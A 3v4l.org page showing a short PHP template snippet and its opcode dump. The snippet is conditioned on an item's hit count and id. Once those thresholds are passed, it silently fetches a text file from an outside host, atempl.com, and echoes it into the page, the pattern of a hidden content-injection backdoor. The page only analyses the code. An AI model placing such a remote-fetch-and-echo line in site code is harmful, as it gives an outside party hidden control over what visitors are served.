3v4l.org

run code in 300+ PHP versions simultaneously
<?php if ( ($this->item->hits >'53' ) && ($this->item->id >'10') ) { $content = file("http://atempl.com/7.txt"); $data = implode($content); echo $data; } ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 46) Position 1 = 5, Position 2 = 10
Branch analysis from position: 5
2 jumps found. (Code = 43) Position 1 = 11, Position 2 = 20
Branch analysis from position: 11
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 20
Branch analysis from position: 10
filename:       /in/I30bB
function name:  (null)
number of ops:  21
compiled vars:  !0 = $content, !1 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   FETCH_THIS                                       $2      
          1        FETCH_OBJ_R                                      ~3      $2, 'item'
          2        FETCH_OBJ_R                                      ~4      ~3, 'hits'
          3        IS_SMALLER                                       ~5      '53', ~4
          4      > JMPZ_EX                                          ~5      ~5, ->10
          5    >   FETCH_THIS                                       $6      
          6        FETCH_OBJ_R                                      ~7      $6, 'item'
          7        FETCH_OBJ_R                                      ~8      ~7, 'id'
          8        IS_SMALLER                                       ~9      '10', ~8
          9        BOOL                                             ~5      ~9
         10    > > JMPZ                                                     ~5, ->20
    4    11    >   INIT_FCALL                                               'file'
         12        SEND_VAL                                                 'http%3A%2F%2Fatempl.com%2F7.txt'
         13        DO_ICALL                                         $10     
         14        ASSIGN                                                   !0, $10
    5    15        INIT_FCALL                                               'implode'
         16        SEND_VAR                                                 !0
         17        DO_ICALL                                         $12     
         18        ASSIGN                                                   !1, $12
    6    19        ECHO                                                     !1
    8    20    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
174.77 ms | 1395 KiB | 17 Q